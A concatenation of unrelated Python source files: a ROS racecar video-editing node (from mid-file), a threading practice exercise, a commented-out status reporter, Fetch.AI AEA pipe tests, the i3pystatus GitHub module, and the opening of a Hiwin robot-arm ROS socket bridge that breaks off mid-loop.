metric_info (dict): This contains metric information to edit the videos also the phase like training phase
edited_frame_result (dict): A mutable variable holding the dict result of edited frame
"""
top_camera_frame = frame_data[FrameQueueData.FRAME.value][FrameTypes.TOP_CAMERA_FRAME.value]
top_cv_image = self.bridge.imgmsg_to_cv2(top_camera_frame, "bgr8")
top_cv_image = cv2.cvtColor(top_cv_image, cv2.COLOR_RGB2RGBA)
top_cv_image = self.job_type_image_edit_mp4.edit_top_camera_image(top_cv_image, metric_info)
edited_top_frame = self.bridge.cv2_to_imgmsg(top_cv_image, "bgr8")
edited_frame_result[FrameTypes.TOP_CAMERA_FRAME.value] = edited_top_frame
def _edit_camera_images(self, frame_data, is_mp4):
""" Edit camera image by calling respective job type
Arguments:
frame_data (dict): Dictionary of frame, agent_metric_info, training_phase
is_mp4 (bool): Is this edit camera image for kvs or mp4
Returns:
Image: Edited image
"""
metric_info = {
FrameQueueData.AGENT_METRIC_INFO.value: frame_data[FrameQueueData.AGENT_METRIC_INFO.value],
FrameQueueData.TRAINING_PHASE.value: frame_data[FrameQueueData.TRAINING_PHASE.value]
}
# convert ros image message to cv image
try:
edited_frame_result = dict()
self._edit_main_camera_images(frame_data, metric_info, is_mp4, edited_frame_result)
# Edit top camera image only if its F1
edited_frame_result[FrameTypes.TOP_CAMERA_FRAME.value] = None
if self.top_camera_mp4_pub and is_mp4:
self._edit_top_camera_images(frame_data, metric_info, edited_frame_result)
return edited_frame_result
except CvBridgeError as ex:
LOG.info("cv2 to ROS image message error: {}".format(ex))
def get_latest_frame_metric_data(self):
""" Get the latest frame, metric information, training phase data from the double buffer.
Returns:
queue_data (dict): Contains information of the frame, agent_metric_info, training_phase
"""
agent_metric_info = [metrics.get() for metrics in self._agents_metrics]
queue_data = {
FrameQueueData.FRAME.value: {
FrameTypes.MAIN_CAMERA_FRAME.value: self._main_camera_frame_buffer.get(),
FrameTypes.TOP_CAMERA_FRAME.value: (self._top_camera_frame_buffer.get()
if self.top_camera_mp4_pub else [])
},
FrameQueueData.AGENT_METRIC_INFO.value: agent_metric_info,
FrameQueueData.TRAINING_PHASE.value: self._current_training_phase.get() if self.is_training else ''
}
return queue_data
def _producer_frame_thread(self, frame):
""" Callback for the main camera frame. Once a new image is received, all the required
service calls are made to get the video metric information. Then for Mp4 its put into the queue
but for the KVS its put into a double since we only care for the latest image for KVS
Arguments:
frame (cv2.ImgMsg): Image/Sensor topic of the camera image frame
"""
if not rospy.is_shutdown():
if len(self.racecars_info) != len(self._mp4_queue):
pass
self._update_racers_metrics()
self._main_camera_frame_buffer.put(frame)
# Get frame from main camera & agents metric information
frame_metric_data = self.get_latest_frame_metric_data()
if self.is_save_mp4_enabled:
if self._mp4_queue[self.racecar_index].qsize() == MAX_FRAMES_IN_QUEUE:
LOG.info("Dropping Mp4 frame from the queue")
self._mp4_queue[self.racecar_index].get()
# Append to the MP4 queue
self._mp4_queue[self.racecar_index].put(frame_metric_data)
def _consumer_mp4_frame_thread(self):
""" Consumes the frame produced by the _producer_frame_thread and edits the image
The edited image is put into another queue for publishing to MP4 topic
"""
while not rospy.is_shutdown():
frame_data = None
try:
# Pop from the queue and edit the image
frame_data = self._mp4_queue[self.racecar_index].get(timeout=QUEUE_WAIT_TIME)
except Queue.Empty:
LOG.debug("AgentsVideoEditor._mp4_queue['{}'] is empty. Retrying...".format(self.racecar_index))
if frame_data:
edited_frames = self._edit_camera_images(frame_data, is_mp4=True)
self.mp4_main_camera_pub.publish(edited_frames[FrameTypes.MAIN_CAMERA_FRAME.value])
if self.top_camera_mp4_pub:
self.top_camera_mp4_pub.publish(edited_frames[FrameTypes.TOP_CAMERA_FRAME.value])
def _kvs_publisher(self):
""" Publishing the latest edited image to KVS topic at 15 FPS real time.
In case of Kinesis video stream we want to publish frames real time at 15 FPS. If the frames
are not published at this rate, there will be jitter and video will be laggy. So it has to always
be the real time. Unlike mp4_publisher this cannot be a simulation time.
"""
try:
prev_time = time.time()
while not rospy.is_shutdown():
frame_metric_data = self.get_latest_frame_metric_data()
edited_frames = self._edit_camera_images(frame_metric_data, is_mp4=False)
if not rospy.is_shutdown():
self.kvs_pub.publish(edited_frames[FrameTypes.MAIN_CAMERA_FRAME.value])
cur_time = time.time()
time_diff = cur_time - prev_time
time.sleep(max(KVS_PUBLISH_PERIOD - time_diff, 0))
prev_time = time.time()
except (rospy.ROSInterruptException, rospy.ROSException):
pass
def get_racecars_info(racecar_names):
""" This function returns the agents information like name, car color, display name
Arguments:
racecar_names (list): comma seperated racecar names
Returns:
(list): Racecar information such as name, car color, display name
"""
racecars = racecar_names
racecars_info = list()
racecars_color = force_list(rospy.get_param("CAR_COLOR",
[DEFAULT_COLOR] * len(racecar_names)))
racecars_display_name = get_video_display_name()
for i, racecar_name in enumerate(racecars):
racecar_dict = dict()
racecar_dict['name'] = racecar_name
racecar_dict['racecar_color'] = racecars_color[i]
racecar_dict['display_name'] = racecars_display_name[i]
racecars_info.append(racecar_dict)
return racecars_info
def main(racecar_names, is_publish_to_kvs_stream):
""" Main function for kinesis_video_camera
Arguments:
racecar_names (list): racecar_names as a comma seperated string
"""
try:
racecars_info = get_racecars_info(racecar_names)
for racecar in racecars_info:
# Instantiate AgentCameraVideoEditor objects for each racecar
AgentsVideoEditor(racecar['name'], racecars_info, is_publish_to_kvs_stream)
except Exception as err_msg:
log_and_exit("Exception in Kinesis Video camera ros node: {}".format(err_msg),
SIMAPP_SIMULATION_KINESIS_VIDEO_CAMERA_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500)
if __name__ == '__main__':
# comma seperated racecar names passed as an argument to the node
rospy.init_node('agent_camera_video_editor_node', anonymous=True)
RACER_NUM = int(sys.argv[1])
RACECAR_NAMES = get_racecar_names(RACER_NUM)
PUBLISH_TO_KVS_STREAM = False if sys.argv[2] == "False" else True
LOG.info("Publishing to KVS stream is enabled: {}".format(str(PUBLISH_TO_KVS_STREAM)))
main(RACECAR_NAMES, PUBLISH_TO_KVS_STREAM)
rospy.spin()
|
asynchronous.py
|
# Practice Activity: Asynchronous Programming
#
# Continue from the previous practice activity.
# Change your code to use asyn functions instead of threads.
# Create an even loop just as we did in the video --
# you will just need to change the function body itself.
#
# Note: When you are doing async functions,
# you cannot use time.sleep(1).
# Instead, you should use: await asyncio.sleep(1)
import time
import threading
balance = 10000
lock = threading.Lock()
def withdrawl():
global balance, lock
with lock:
v = balance
if v >= 10:
time.sleep(0.001)
v = v - 10
balance = v
return
if __name__ == "__main__":
thread_list = []
for i in range(1100):
t = threading.Thread(target=withdrawl)
thread_list.append(t)
t.start()
for i in thread_list:
i.join()
print("Balance: {}".format(balance))
|
status_report.py
|
# import os
# import sys
# from ctypes import c_char
# from io import StringIO
# from multiprocessing import Process, Manager, Value, Array
# from subprocess import Popen, PIPE
# from time import sleep
#
#
# class StatusStdOut(StringIO):
# def __init__(self, stdout):
# self.stdout = stdout
#
# def write(self, s):
# self.stdout += s
#
#
# class StatusStruct(object):
# def __init__(self, process):
# self.status = ""
# self.process = process
#
#
# class StatusProcess(Process):
# def __init__(self, *args, **kwargs):
# self.stdout = Manager().list("")
# kwargs["kwargs"]["stdout"] = self.stdout
# super(StatusProcess, self).__init__(*args, **kwargs)
#
# def __str__(self):
# return "".join(self.stdout)
#
# LIMPAR_ATE_O_FIM_DA_LINHA = '\x1b[K'
# class StatusReport(object):
# processes = {}
#
# @staticmethod
# def run(name, cmd, *args, **kwargs):
# # sys.stdout = StatusStdOut()
# # try:
# # while p.poll() is None:
# # if verbose and p.stdout is not None:
# # print(p.stdout.readline().decode(), end="")
# # print(p.stderr.readline().decode(), end="")
# p = StatusProcess(target=StatusReport._parallel_run, args=(cmd,) + args, kwargs=kwargs)
# p.start()
# StatusReport.processes[name] = p
# while p.is_alive():
# # os.system("clear")
# info = str(p).split("\n")[-6:]
# if info:
# # print(info)
# for i in info:
# print(i)
# os.system("tput el")
# os.system("tput cuu %d" % len(info))
# sleep(0.1)
# p.join()
# # sys.stdout = sys.__stdout__
#
# @staticmethod
# def _parallel_run(cmd, *args, verbose=True, folder=None, stdout=None, **kwargs):
# sys.stdout = StatusStdOut(stdout)
# if folder:
# os.chdir(folder)
# try:
# if isinstance(cmd, str):
# p = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
# while p.poll():
# if verbose:
# print(p.stdout.readline().decode(), end="")
# print(p.stderr.readline().decode(), end="")
# if verbose:
# line = p.stdout.readline()
# while line:
# print(line.decode(), end="")
# line = p.stdout.readline()
# # [print(l.decode(), end="") for l in p.stdout.readlines()]
# # [print(l.decode(), end="") for l in p.stderr.readlines()]
#
# return p.poll()
# if callable(cmd):
# print("call")
#
# except KeyboardInterrupt:
# pass
# finally:
# sys.stdout = sys.__stdout__
#
# @staticmethod
# def print_report():
# pass
|
test_pipe.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Tests for the pipe module."""
import asyncio
from threading import Thread
import pytest
from aea.helpers.pipe import (
IPCChannelClient,
PosixNamedPipeChannel,
PosixNamedPipeChannelClient,
TCPSocketChannel,
TCPSocketChannelClient,
make_ipc_channel,
make_ipc_channel_client,
)
from tests.conftest import skip_test_windows
def _run_echo_service(client: IPCChannelClient):
async def echo_service(client: IPCChannelClient):
try:
await client.connect()
while True:
data = await client.read()
if not data:
break
await client.write(data)
except (asyncio.IncompleteReadError, asyncio.CancelledError, OSError):
pass
finally:
await client.close()
loop = asyncio.new_event_loop()
loop.run_until_complete(echo_service(client))
@pytest.mark.asyncio
class TestAEAHelperMakePipe:
"""Test that make_ipc_channel utility and abstract class IPCChannel work properly"""
@pytest.mark.asyncio
async def test_connection_communication(self):
"""Test connection communication."""
pipe = make_ipc_channel()
assert (
pipe.in_path is not None and pipe.out_path is not None
), "Pipe not properly setup"
connected = asyncio.ensure_future(pipe.connect())
client_pipe = make_ipc_channel_client(pipe.out_path, pipe.in_path)
client = Thread(target=_run_echo_service, args=[client_pipe])
client.start()
try:
assert await connected, "Failed to connect pipe"
message = b"hello"
await pipe.write(message)
received = await pipe.read()
assert received == message, "Echoed message differs"
except Exception:
raise
finally:
await pipe.close()
client.join()
@pytest.mark.asyncio
class TestAEAHelperTCPSocketChannel:
"""Test that TCPSocketChannel work properly"""
@pytest.mark.asyncio
async def test_connection_communication(self):
"""Test connection communication."""
pipe = TCPSocketChannel()
assert (
pipe.in_path is not None and pipe.out_path is not None
), "TCPSocketChannel not properly setup"
connected = asyncio.ensure_future(pipe.connect())
client_pipe = TCPSocketChannelClient(pipe.out_path, pipe.in_path)
client = Thread(target=_run_echo_service, args=[client_pipe])
client.start()
try:
assert await connected, "Failed to connect pipe"
message = b"hello"
await pipe.write(message)
received = await pipe.read()
assert received == message, "Echoed message differs"
except Exception:
raise
finally:
await pipe.close()
client.join()
@pytest.mark.asyncio
async def test_connection_refused(self):
"""Test connection refused."""
pipe = TCPSocketChannel()
assert (
pipe.in_path is not None and pipe.out_path is not None
), "TCPSocketChannel not properly setup"
client_pipe = TCPSocketChannelClient(pipe.out_path, pipe.in_path)
connected = await client_pipe.connect()
assert connected is False
@skip_test_windows
@pytest.mark.asyncio
class TestAEAHelperPosixNamedPipeChannel:
"""Test that TCPSocketChannel work properly"""
@pytest.mark.asyncio
async def test_connection_communication(self):
"""Test connection communication."""
pipe = PosixNamedPipeChannel()
assert (
pipe.in_path is not None and pipe.out_path is not None
), "PosixNamedPipeChannel not properly setup"
connected = asyncio.ensure_future(pipe.connect())
client_pipe = PosixNamedPipeChannelClient(pipe.out_path, pipe.in_path)
client = Thread(target=_run_echo_service, args=[client_pipe])
client.start()
try:
assert await connected, "Failed to connect pipe"
message = b"hello"
await pipe.write(message)
received = await pipe.read()
assert received == message, "Echoed message differs"
except Exception:
raise
finally:
await pipe.close()
client.join()
|
github.py
|
import copy
import json
import re
import threading
import time
from urllib.request import urlopen
from i3pystatus import IntervalModule, formatp
from i3pystatus.core import ConfigError
from i3pystatus.core.desktop import DesktopNotification
from i3pystatus.core.util import user_open, internet, require
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
API_METHODS_URL = 'https://status.github.com/api.json'
STATUS_URL = 'https://www.githubstatus.com'
NOTIFICATIONS_URL = 'https://github.com/notifications'
ACCESS_TOKEN_AUTH_URL = 'https://api.github.com/notifications?access_token=%s'
BASIC_AUTH_URL = 'https://api.github.com/notifications'
class Github(IntervalModule):
'''
This module checks the GitHub system status, and optionally the number of
unread notifications.
.. versionchanged:: 3.36
Module now checks system status in addition to unread notifications.
.. note::
For notification checking, the following is required:
- The requests_ module must be installed.
- Either ``access_token`` (recommended) or ``username`` and
``password`` must be used to authenticate to GitHub.
Using an access token is the recommended authentication method. Click
here__ to generate a new access token. Fill in the **Token
description** box, and enable the **notifications** scope by checking
the appropriate checkbox. Then, click the **Generate token** button.
.. important::
An access token is the only supported means of authentication for
this module, if `2-factor authentication`_ is enabled.
.. _requests: https://pypi.python.org/pypi/requests
.. __: https://github.com/settings/tokens/new
.. _`2-factor authentication`: https://help.github.com/articles/about-two-factor-authentication/
See here__ for more information on GitHub's authentication API.
.. __: https://developer.github.com/v3/#authentication
If you would rather use a username and password pair, you can either
pass them as arguments when registering the module, or use i3pystatus'
:ref:`credential management <credentials>` support to store them in a
keyring. Keep in mind that if you do not pass a ``username`` or
``password`` parameter when registering the module, i3pystatus will
still attempt to retrieve these values from a keyring if the keyring_
Python module is installed. This could result in i3pystatus aborting
during startup if it cannot find a usable keyring backend. If you do
not plan to use credential management at all in i3pystatus, then you
should either ensure that A) keyring_ is not installed, or B) both
keyring_ and keyrings.alt_ are installed, to avoid this error.
.. _keyring: https://pypi.python.org/pypi/keyring
.. _keyrings.alt: https://pypi.python.org/pypi/keyrings.alt
.. rubric:: Available formatters
* `{status}` — Current GitHub status. This formatter can be different
depending on the current status (``good``, ``minor``, or ``major``).
The content displayed for each of these statuses is defined in the
**status** config option.
* `{unread}` — When there are unread notifications, this formatter will
contain the value of the **unread_marker** marker config option.
there are no unread notifications, it formatter will be an empty string.
* `{unread_count}` — The number of unread notifications
notifications, it will be an empty string.
* `{update_error}` — When an error is encountered updating this module,
this formatter will be set to the value of the **update_error**
config option.
.. rubric:: Click events
This module responds to 4 different click events:
- **Left-click** — Forces an update of the module.
- **Right-click** — Triggers a desktop notification showing the most recent
update to the GitHub status. This is useful when the status changes when
you are away from your computer, so that the updated status can be seen
without visiting the `GitHub Status Dashboard`_. This click event
requires **notify_status** to be set to ``True``.
- **Double left-click** — Opens the GitHub `notifications page`_ in your web
browser.
- **Double right-click** — Opens the `GitHub Status Dashboard`_ in your web
browser.
.. rubric:: Desktop notifications
.. versionadded:: 3.36
If **notify_status** is set to ``True``, a notification will be displayed
when the status reported by the `GitHub Status API`_ changes.
If **notify_unread** is set to ``True``, a notification will be displayed
when new unread notifications are found. Double-clicking the module will
launch the GitHub notifications dashboard in your browser.
.. note::
A notification will be displayed if there was a problem querying the
`GitHub Status API`_, irrespective of whether or not **notify_status**
or **notify_unread** is set to ``True``.
.. rubric:: Example configuration
The below example enables desktop notifications, enables Pango hinting for
differently-colored **update_error** and **refresh_icon** text, and alters
the both the status text and the colors used to visually denote the current
status level. It also sets the log level to debug, for troubleshooting
purposes.
.. code-block:: python
status.register(
'github',
log_level=logging.DEBUG,
notify_status=True,
notify_unread=True,
access_token='0123456789abcdef0123456789abcdef01234567',
hints={'markup': 'pango'},
update_error='<span color="#af0000">!</span>',
refresh_icon='<span color="#ff5f00">⟳</span>',
status={
'good': '✓',
'minor': '!',
'major': '!!',
},
colors={
'good': '#008700',
'minor': '#d7ff00',
'major': '#af0000',
},
)
.. note::
Setting debug logging and authenticating with an access token will
include the access token in the log file, as the notification URL is
logged at this level.
.. _`GitHub Status API`: https://status.github.com/api
.. _`GitHub Status Dashboard`: https://status.github.com
.. _`notifications page`: https://github.com/notifications
.. rubric:: Extended string formatting
.. versionadded:: 3.36
This module supports the :ref:`formatp <formatp>` extended string format
syntax. This allows for values to be hidden when they evaluate as False.
The default ``format`` string value for this module makes use of this
syntax to conditionally show the value of the ``update_error`` config value
when the backend encounters an error during an update, but this can also
be used to only show the number of unread notifications when that number is
not **0**. The below example would show the unread count as **(3)** when
there are 3 unread notifications, but would show nothing when there are no
unread notifications.
.. code-block:: python
status.register(
'github',
notify_status=True,
notify_unread=True,
access_token='0123456789abcdef0123456789abcdef01234567',
format='{status}[ ({unread_count})][ {update_error}]'
)
'''
settings = (
('format', 'format string'),
('status', 'Dictionary mapping statuses to the text which represents '
'that status type. This defaults to ``GitHub`` for all '
'status types.'),
('colors', 'Dictionary mapping statuses to the color used to display '
'the status text'),
('refresh_icon', 'Text to display (in addition to any text currently '
'shown by the module) when refreshing the GitHub '
'status. **NOTE:** Depending on how quickly the '
'update is performed, the icon may not be displayed.'),
('update_error', 'Value for the ``{update_error}`` formatter when an '
'error is encountered while checking GitHub status'),
('keyring_backend', 'alternative keyring backend for retrieving '
'credentials'),
('username', ''),
('password', ''),
('access_token', ''),
('unread_marker', 'Defines the string that the ``{unread}`` formatter '
'shows when there are pending notifications'),
('notify_status', 'Set to ``True`` to display a desktop notification '
'on status changes'),
('notify_unread', 'Set to ``True`` to display a desktop notification '
'when new notifications are detected'),
('unread_notification_template',
'String with no more than one ``%d``, which will be replaced by '
'the number of new unread notifications. Useful for those with '
'non-English locales who would like the notification to be in '
'their native language. The ``%d`` can be omitted if desired.'),
('api_methods_url', 'URL from which to retrieve the API endpoint URL '
'which this module will use to check the GitHub '
'Status'),
('status_url', 'The URL to the status page (opened when the module is '
'double-clicked with the right mouse button'),
('notifications_url', 'The URL to the GitHub notifications page '
'(opened when the module is double-clicked with '
'the left mouse button'),
)
# Defaults for module configurables
_default_status = {
'good': 'GitHub',
'minor': 'GitHub',
'major': 'GitHub',
}
_default_colors = {
'good': '#2f895c',
'minor': '#f29d50',
'major': '#cc3300',
}
# Module configurables
format = '{status}[ {unread}][ {update_error}]'
status = _default_status
colors = _default_colors
refresh_icon = '⟳'
update_error = '!'
username = ''
password = ''
access_token = ''
unread_marker = '•'
notify_status = False
notify_unread = False
unread_notification_template = 'You have %d new notification(s)'
api_methods_url = API_METHODS_URL
status_url = STATUS_URL
notifications_url = NOTIFICATIONS_URL
# Global configurables
interval = 600
max_error_len = 50
keyring_backend = None
# Other
unread = ''
unknown_color = None
unknown_status = '?'
failed_update = False
previous_status = None
current_status = None
new_unread = None
previous_unread = None
current_unread = None
config_error = None
data = {'status': '',
'unread': 0,
'unread_count': '',
'update_error': ''}
output = {'full_text': '', 'color': None}
# Click events
on_leftclick = ['perform_update']
on_rightclick = ['show_status_notification']
on_doubleleftclick = ['launch_notifications_url']
on_doublerightclick = ['launch_status_url']
@require(internet)
def launch_status_url(self):
self.logger.debug('Launching %s in browser', self.status_url)
user_open(self.status_url)
@require(internet)
def launch_notifications_url(self):
self.logger.debug('Launching %s in browser', self.notifications_url)
user_open(self.notifications_url)
def init(self):
if self.status != self._default_status:
new_status = copy.copy(self._default_status)
new_status.update(self.status)
self.status = new_status
if self.colors != self._default_colors:
new_colors = copy.copy(self._default_colors)
new_colors.update(self.colors)
self.colors = new_colors
self.logger.debug('status = %s', self.status)
self.logger.debug('colors = %s', self.colors)
self.condition = threading.Condition()
self.thread = threading.Thread(target=self.update_loop, daemon=True)
self.thread.start()
def update_loop(self):
try:
self.perform_update()
while True:
with self.condition:
self.condition.wait(self.interval)
self.perform_update()
except Exception:
msg = 'Exception in {thread} at {time}, module {name}'.format(
thread=threading.current_thread().name,
time=time.strftime('%c'),
name=self.__class__.__name__,
)
self.logger.error(msg, exc_info=True)
@require(internet)
def status_api_request(self, url):
self.logger.debug('Making GitHub Status API request to %s', url)
try:
with urlopen(url) as content:
try:
content_type = dict(content.getheaders())['Content-Type']
charset = re.search(r'charset=(.*)', content_type).group(1)
except AttributeError:
charset = 'utf-8'
response_json = content.read().decode(charset).strip()
if not response_json:
self.logger.error('JSON response from %s was blank', url)
return {}
try:
response = json.loads(response_json)
except json.decoder.JSONDecodeError as exc:
self.logger.error('Error loading JSON: %s', exc)
self.logger.debug('JSON text that failed to load: %s',
response_json)
return {}
self.logger.log(5, 'API response: %s', response)
return response
except Exception as exc:
self.logger.error(
'Failed to make API request to %s. Exception follows:', url,
exc_info=True
)
return {}
def detect_status_change(self, response=None):
if response is not None:
# Compare last update to current and exit without displaying a
# notification if one is not needed.
if self.previous_status is None:
# This is the first time status has been updated since
# i3pystatus was started. Set self.previous_status and exit.
self.previous_status = response
return
if response == self.previous_status:
# No change, so no notification
return
self.previous_status = response
if self.previous_status is None:
# The only way this would happen is if we invoked the right-click
# event before we completed the initial status check.
return
self.show_status_notification()
@staticmethod
def notify(message):
return DesktopNotification(title='GitHub', body=message).display()
def skip_notify(self, message):
self.logger.debug(
'Desktop notifications turned off. Skipped notification: %s',
message
)
return False
def show_status_notification(self):
message = self.current_status.get(
'body',
'Missing \'body\' param in API response'
)
return self.skip_notify(message) \
if not self.notify_status \
else self.notify(message)
def show_unread_notification(self):
if '%d' not in self.unread_notification_template:
formatted = self.unread_notification_template
else:
try:
new_unread = len(self.new_unread)
except TypeError:
new_unread = 0
try:
formatted = self.unread_notification_template % new_unread
except TypeError as exc:
self.logger.error(
'Failed to format {0!r}: {1}'.format(
self.unread_notification_template,
exc
)
)
return False
return self.skip_notify(formatted) \
if not self.notify_unread \
else self.notify(formatted)
@require(internet)
def perform_update(self):
self.output['full_text'] = \
self.refresh_icon + self.output.get('full_text', '')
self.failed_update = False
self.update_status()
try:
self.config_error = None
self.update_unread()
except ConfigError as exc:
self.config_error = exc
self.data['update_error'] = self.update_error \
if self.failed_update \
else ''
self.refresh_display()
@require(internet)
def update_status(self):
try:
# Get most recent update
if not hasattr(self, 'last_message_url'):
self.last_message_url = \
self.status_api_request(API_METHODS_URL)['last_message_url']
self.current_status = self.status_api_request(self.last_message_url)
if not self.current_status:
self.failed_update = True
return
self.data['status'] = self.status.get(
self.current_status.get('status'),
self.unknown_status)
if self.previous_status is not None:
if self.current_status != self.previous_status:
self.show_status_notification()
self.previous_status = self.current_status
except Exception:
# Don't let an uncaught exception kill the update thread
self.logger.error(
'Uncaught error occurred while checking GitHub status. '
'Exception follows:', exc_info=True
)
self.failed_update = True
@require(internet)
def update_unread(self):
# Reset the new_unread attribute to prevent spurious notifications
self.new_unread = None
try:
if not self.username and not self.password and not self.access_token:
# Auth not configured
self.logger.debug(
'No auth configured, notifications will not be checked')
return True
if not HAS_REQUESTS:
self.logger.error(
'The requests module is required to check GitHub notifications')
self.failed_update = True
return False
self.logger.debug(
'Checking unread notifications using %s',
'access token' if self.access_token else 'username/password'
)
old_unread_url = None
if self.access_token:
unread_url = ACCESS_TOKEN_AUTH_URL % self.access_token
else:
unread_url = BASIC_AUTH_URL
self.current_unread = set()
page_num = 0
while old_unread_url != unread_url:
old_unread_url = unread_url
page_num += 1
self.logger.debug(
'Reading page %d of notifications (%s)',
page_num, unread_url
)
try:
if self.access_token:
response = requests.get(unread_url)
else:
response = requests.get(
unread_url,
auth=(self.username, self.password)
)
self.logger.log(
5,
'Raw return from GitHub notification check: %s',
response.text)
unread_data = json.loads(response.text)
except (requests.ConnectionError, requests.Timeout) as exc:
self.logger.error(
'Failed to check unread notifications: %s', exc)
self.failed_update = True
return False
except json.decoder.JSONDecodeError as exc:
self.logger.error('Error loading JSON: %s', exc)
self.logger.debug(
'JSON text that failed to load: %s', response.text)
self.failed_update = True
return False
# Bad credentials or some other error
if isinstance(unread_data, dict):
raise ConfigError(
unread_data.get(
'message',
'Unknown error encountered retrieving unread notifications'
)
)
# Update the current count of unread notifications
self.current_unread.update(
[x['id'] for x in unread_data if 'id' in x]
)
# Check 'Link' header for next page of notifications
# (https://tools.ietf.org/html/rfc5988#section-5)
self.logger.debug('Checking for next page of notifications')
try:
link_header = response.headers['Link']
except AttributeError:
self.logger.error(
'No headers present in response. This might be due to '
'an API change in the requests module.'
)
self.failed_update = True
continue
except KeyError:
self.logger.debug('Only one page of notifications present')
continue
else:
# Process 'Link' header
try:
links = requests.utils.parse_header_links(link_header)
except Exception as exc:
self.logger.error(
'Failed to parse \'Link\' header: %s', exc
)
self.failed_update = True
continue
for link in links:
try:
link_rel = link['rel']
if link_rel != 'next':
# Link does not refer to the next page, skip it
continue
# Set the unread_url so that when we reach the top
# of the outer loop, we have a new URL to check.
unread_url = link['url']
break
except TypeError:
# Malformed hypermedia link
self.logger.warning(
'Malformed hypermedia link (%s) in \'Link\' '
'header (%s)', link, links
)
continue
else:
self.logger.debug('No more pages of notifications remain')
if self.failed_update:
return False
self.data['unread_count'] = len(self.current_unread)
self.data['unread'] = self.unread_marker \
if self.data['unread_count'] > 0 \
else ''
if self.previous_unread is not None:
if not self.current_unread.issubset(self.previous_unread):
self.new_unread = self.current_unread - self.previous_unread
if self.new_unread:
self.show_unread_notification()
self.previous_unread = self.current_unread
return True
except ConfigError as exc:
# This will be caught by the calling function
raise exc
except Exception as exc:
# Don't let an uncaught exception kill the update thread
self.logger.error(
'Uncaught error occurred while checking GitHub notifications. '
'Exception follows:', exc_info=True
)
self.failed_update = True
return False
def refresh_display(self):
previous_color = self.output.get('color')
try:
if 'status' in self.current_status:
color = self.colors.get(
self.current_status['status'],
self.unknown_color)
else:
# Failed status update, keep the existing color
color = previous_color
except TypeError:
# Shouldn't get here, but this would happen if this function is
# called before we check the current status for the first time.
color = previous_color
self.output = {'full_text': formatp(self.format, **self.data).strip(),
'color': color}
def run(self):
if self.config_error is not None:
raise self.config_error
|
HiwinRA605_socket_ros_test_20190625191433.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 0 #假設手臂Ready
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = int('%s'%req.Speedmode)
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
if Arm_feedback == 0:
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
